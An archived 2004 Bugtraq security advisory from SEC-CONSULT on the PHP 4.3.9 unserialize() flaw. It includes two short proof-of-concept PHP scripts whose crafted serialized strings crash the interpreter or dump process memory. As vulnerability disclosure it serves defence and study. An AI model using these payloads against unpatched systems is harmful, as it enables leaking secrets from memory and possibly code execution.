lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20041215223254.04a7223f.martin@websec.org>
Date: Wed, 15 Dec 2004 22:32:54 +0100
From: Martin Eiszner <martin@...sec.org>
To: bugtraq@...urityfocus.com
Subject: php unserialize



==============================================================
SEC-CONSULT Security Advisory PHP - 4.3.9 unserialize function
======================OOOOOOOOOOOO============================

Product:        PHP 4.3.9 (Win32/Unix)
Remarks:        no other Versions tested but very likely vulnerable

Vulnerablities:

- Data Segment memory corruption
- Information disclosure / Memory dumping

Vendor:         PHP (http://www.php.net/)
Vendor-Status:  vendor contacted (19.11.2004)
Vendor-Patchs:  vendor has released bugfixed versions

Object: ---

Exploitable:
Local:          ---
Remote:         PARTIAL (OS-dependent)

============
Introduction
============

Visit "http://www.php.net" for additional information.


=====================
Vulnerability Details
=====================


1) Memory Corruption / buffer overflow
======================================

FUNCTION:
unserialize (http://at.php.net/manual/en/function.unserialize.php)

DESCRIPTION:
Insufficient input validation of serialized strings lead to memory corruption and information disclosre.

EXAMPLE script - "Segfault":
---cut here---
<?
$s = 's:9999999:"A";"';
$a = unserialize($s);
print $a;
?>
---cut here---

REMARKS:
leads to arbitrary code execution and file/information disclosure.


EXAMPLE script - "Memory Dump":
---cut here---
<?
// session- and stuff
$secret_username="uaaaa";
$secret_password="hoschi";

// stuff
// $c = $_COOKIE ['crypted_stuff']
// $c = some cookie
/* simplyfied --> userinput */ $c = 's:30000:"crap";';

$userdata = unserialize($c);
//
// check $userdata stuff
// for some reason output $userdata
print $userdata . "\n is NOT valid !!\n";

// stuff
?>
---cut here---


REMARKS:
Could theoretically be used to circumvent safe-mode and/or gain sensitive information about script- and memory areas.


===============
GENERAL REMARKS
===============
We would like to apologize in advance for potential nonconformities and/or known issues.

=========================================================================================================================
FOR SOME STRANGE REASONS HARDENED-PHP.NET HAS RELEASED THIS ADVISORY TODAY TOGETHER WITH A BUNCH OF OTHER VULNERABILITIES
=========================================================================================================================

====================
Recommended Hotfixes
====================

Vendor-Patches: vendor has released bugfixed versions

=======
Contact
=======

SEC-CONSULT
Austria / EUROPE
m.eiszner@...-consult.com


EOF Martin Eiszner / @2004m.eiszner@...-consult.com






Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ